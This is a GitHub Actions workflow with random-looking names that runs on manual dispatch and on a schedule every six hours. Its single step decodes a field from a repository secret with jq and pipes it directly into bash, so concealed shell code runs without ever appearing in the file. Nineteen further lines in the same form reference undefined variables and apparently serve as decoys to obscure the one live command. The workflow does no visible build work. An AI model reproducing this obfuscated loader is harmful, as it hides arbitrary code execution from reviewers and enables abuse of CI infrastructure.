name: gaozhizi7162

on:
  workflow_dispatch:
  schedule:
    - cron: '39 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gaozhizi7162
        env:
          up1: ${{ secrets.up1 }}
        run: |
          echo $up1 | jq -r .lhit9257 | /bin/bash
          echo $gzo4112 | jq -r .smru683 | /bin/bash
          echo $c42530 | jq -r .bahk84381 | /bin/bash
          echo $bdg3 | jq -r .ozlcq73656 | /bin/bash
          echo $ymiut9747 | jq -r .xb17 | /bin/bash
          echo $vm814 | jq -r .s43053 | /bin/bash
          echo $nkc08714 | jq -r .osunv9 | /bin/bash
          echo $ctll3445 | jq -r .j02862 | /bin/bash
          echo $qkuj90482 | jq -r .zb734 | /bin/bash
          echo $rbwwq9036 | jq -r .xjnb20 | /bin/bash
          echo $xys7 | jq -r .bth4 | /bin/bash
          echo $hnx0 | jq -r .a768 | /bin/bash
          echo $ljso1278 | jq -r .jby010 | /bin/bash
          echo $ukz5 | jq -r .t623 | /bin/bash
          echo $y3909 | jq -r .rqh11 | /bin/bash
          echo $skr3 | jq -r .d5782 | /bin/bash
          echo $jlxp1248 | jq -r .qttx990 | /bin/bash
          echo $aaar687 | jq -r .lllx7 | /bin/bash
          echo $rkt3750 | jq -r .a7736 | /bin/bash
          echo $ytail841 | jq -r .po6 | /bin/bash

